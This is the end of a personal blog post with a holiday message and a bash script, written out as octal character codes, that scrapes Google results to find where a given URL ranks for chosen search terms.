My time and effort is about the only thing I can afford to give this Christmas. All the money's going toward buying the kids' presents, because I want them to remember their childhood fondly (which gives me panic attacks ;) and not as a time of recession, conservation and perceived punishment for some huge corporation's massive screw-ups. Hopefully, my sheltering doesn't end up producing intolerable adults who'll scorn my existence later in life and/or try to have me declared incompetent so they can take control over my pocket change ;)

Happy Holidays to you all and enjoy the hunt :)

P.S. Check this post for a halfway decent way to download this code without having to manually convert it back from a single line! Look for the step-by-step method I use, when I can't get to the admin interface of this blog, in section 2.

Cheers,


Creative Commons License


This work is licensed under a
Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License

043 041 057 142 151 156 057 142 141 163 150 012 012 151 146 040
133 040 044 043 040 055 154 164 040 062 040 055 141 040 044 043
040 055 156 145 040 060 040 135 073 164 150 145 156 040 145 143
150 157 040 042 125 163 141 147 145 072 040 044 060 040 125 122
114 040 123 145 141 162 143 150 137 124 145 162 155 050 163 051
042 073 145 143 150 157 040 042 125 122 114 040 167 151 164 150
040 157 162 040 167 151 164 150 040 150 164 164 160 050 163 051
072 057 057 054 040 146 164 160 072 057 057 054 040 145 164 143
042 073 145 170 151 164 040 061 073 146 151 073 151 146 040 133
040 044 043 040 055 145 161 040 060 040 135 073 164 150 145 156
040 167 150 151 154 145 040 162 145 141 144 040 170 040 171 073
144 157 040 165 162 154 075 044 170 073 040 163 145 141 162 143
150 137 164 145 162 155 163 075 044 171 073 040 044 060 040 044
170 040 042 044 171 042 073 144 157 156 145 073 145 170 151 164
040 060 073 145 154 163 145 040 165 162 154 075 044 061 073 163
150 151 146 164 073 163 145 141 162 143 150 137 164 145 162 155
163 075 044 100 073 146 151 073 142 141 163 145 075 060 073 156
165 155 075 061 073 163 164 141 162 164 075 060 073 155 165 154
164 151 160 154 145 137 163 145 141 162 143 150 075 060 073 156
157 164 137 146 157 165 156 144 075 060 073 146 157 162 040 170
040 151 156 040 044 163 145 141 162 143 150 137 164 145 162 155
163 073 144 157 040 151 146 040 133 040 044 155 165 154 164 151
160 154 145 137 163 145 141 162 143 150 040 055 145 161 040 060
040 135 073 164 150 145 156 040 163 145 141 162 143 150 137 163
164 162 151 156 147 075 044 170 073 155 165 154 164 151 160 154
145 137 163 145 141 162 143 150 075 061 073 145 154 163 145 040
163 145 141 162 143 150 137 163 164 162 151 156 147 075 042 044
173 163 145 141 162 143 150 137 163 164 162 151 156 147 175 053
044 170 042 073 146 151 073 144 157 156 145 073 145 143 150 157
040 042 123 145 141 162 143 150 151 156 147 040 106 157 162 040
107 157 157 147 154 145 040 111 156 144 145 170 040 106 157 162
040 044 165 162 154 040 127 151 164 150 040 123 145 141 162 143
150 040 124 145 162 155 163 072 040 044 163 145 141 162 143 150
137 164 145 162 155 163 056 056 056 042 073 145 143 150 157 073
156 165 155 137 162 145 163 165 154 164 163 075 140 167 147 145
164 040 055 161 040 055 055 165 163 145 162 055 141 147 145 156
164 075 106 151 162 145 146 157 170 040 055 117 040 055 040 150
164 164 160 072 057 057 167 167 167 056 147 157 157 147 154 145
056 143 157 155 057 163 145 141 162 143 150 077 161 075 044 163
145 141 162 143 150 137 163 164 162 151 156 147 134 046 150 154
075 145 156 134 046 163 141 146 145 075 157 146 146 134 046 160
167 163 164 075 061 134 046 163 164 141 162 164 075 044 163 164
141 162 164 134 046 163 141 075 116 174 141 167 153 040 047 173
040 151 146 040 050 040 044 060 040 176 040 057 157 146 040 141
142 157 165 164 040 074 142 076 056 052 074 134 057 142 076 040
146 157 162 057 040 051 040 160 162 151 156 164 040 044 060 040
175 047 174 141 167 153 040 055 106 042 157 146 040 141 142 157
165 164 042 040 047 173 160 162 151 156 164 040 044 062 175 047
174 141 167 153 040 055 106 042 074 142 076 042 040 047 173 160
162 151 156 164 040 044 062 175 047 174 141 167 153 040 055 106
042 074 057 142 076 042 040 047 173 160 162 151 156 164 040 044
061 175 047 140 073 167 150 151 154 145 040 072 073 144 157 040
151 146 040 133 040 044 156 157 164 137 146 157 165 156 144 040
055 145 161 040 061 040 135 073 164 150 145 156 040 142 162 145
141 153 073 146 151 073 167 147 145 164 040 055 161 040 055 055
165 163 145 162 055 141 147 145 156 164 075 106 151 162 145 146
157 170 040 055 117 040 055 040 150 164 164 160 072 057 057 167
167 167 056 147 157 157 147 154 145 056 143 157 155 057 163 145
141 162 143 150 077 161 075 044 163 145 141 162 143 150 137 163
164 162 151 156 147 134 046 156 165 155 075 061 060 060 134 046
150 154 075 145 156 134 046 163 141 146 145 075 157 146 146 134
046 160 167 163 164 075 061 134 046 163 164 141 162 164 075 044
163 164 141 162 164 134 046 163 141 075 116 174 163 145 144 040
047 163 057 074 141 040 150 162 145 146 075 134 042 134 050 133
136 134 042 135 052 134 051 134 042 040 143 154 141 163 163 075
154 076 057 134 156 134 061 134 156 057 147 047 174 141 167 153
040 055 166 040 156 165 155 075 044 156 165 155 040 055 166 040
142 141 163 145 075 044 142 141 163 145 040 047 173 040 151 146
040 050 040 044 061 040 176 040 057 136 150 164 164 160 057 040
051 040 160 162 151 156 164 040 142 141 163 145 054 156 165 155
053 053 054 044 116 106 040 175 047 174 141 167 153 040 047 173
040 151 146 040 050 040 044 062 040 074 040 061 060 040 051 040
160 162 151 156 164 040 042 107 157 157 147 154 145 040 111 156
144 145 170 040 116 165 155 142 145 162 040 042 040 044 061 040
042 060 042 040 044 062 040 042 040 106 157 162 040 120 141 147
145 072 040 042 040 044 063 073 040 145 154 163 145 040 151 146
040 050 040 044 062 040 075 075 040 061 060 060 040 051 040 160
162 151 156 164 040 042 107 157 157 147 154 145 040 111 156 144
145 170 040 116 165 155 142 145 162 040 042 040 044 061 053 061
040 042 060 060 040 106 157 162 040 120 141 147 145 072 040 042
040 044 063 073 145 154 163 145 040 160 162 151 156 164 040 042
107 157 157 147 154 145 040 111 156 144 145 170 040 116 165 155
142 145 162 040 042 040 044 061 040 044 062 040 042 040 106 157
162 040 120 141 147 145 072 040 042 040 044 063 040 175 047 174
147 162 145 160 040 055 151 040 044 165 162 154 073 151 146 040
133 040 044 077 040 055 156 145 040 060 040 135 073 164 150 145
156 040 154 145 164 040 163 164 141 162 164 075 044 163 164 141
162 164 053 061 060 060 073 151 146 040 133 040 044 163 164 141
162 164 040 055 145 161 040 061 060 060 060 040 135 073 164 150
145 156 040 156 157 164 137 146 157 165 156 144 075 061 073 151
146 040 133 040 044 156 157 164 137 146 157 165 156 144 040 055
145 161 040 061 040 135 073 164 150 145 156 040 142 162 145 141
153 073 146 151 073 146 151 073 154 145 164 040 142 141 163 145
075 044 142 141 163 145 053 061 073 146 151 162 163 164 137 160
141 147 145 075 060 073 145 154 163 145 040 142 162 145 141 153
073 146 151 073 154 145 164 040 163 154 145 145 160 137 164 151
155 145 075 044 173 122 101 116 104 117 115 175 057 066 060 060
073 145 143 150 157 040 042 116 157 164 040 111 156 040 124 157
160 040 044 163 164 141 162 164 040 122 145 163 165 154 164 163
072 040 123 154 145 145 160 151 156 147 040 044 163 154 145 145
160 137 164 151 155 145 040 163 145 143 157 156 144 163 056 056
056 042 073 163 154 145 145 160 040 044 163 154 145 145 160 137
164 151 155 145 073 144 157 156 145 073 151 146 040 133 040 044
156 157 164 137 146 157 165 156 144 040 055 145 161 040 061 040
135 073 164 150 145 156 040 145 143 150 157 040 042 116 157 164
040 106 157 165 156 144 040 111 156 040 106 151 162 163 164 040
061 054 060 060 060 040 111 156 144 145 170 040 122 145 163 165
154 164 163 040 055 040 107 157 157 147 154 145 047 163 040 110
141 162 144 040 114 151 155 151 164 042 073 145 143 150 157 073
146 151 073 145 143 150 157 040 042 117 165 164 040 117 146 040
101 160 160 162 157 170 151 155 141 164 145 154 171 040 044 156
165 155 137 162 145 163 165 154 164 163 040 122 145 163 165 154
164 163 042 073 145 143 150 157 073 145 170 151 164 040 060


, Mike




Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.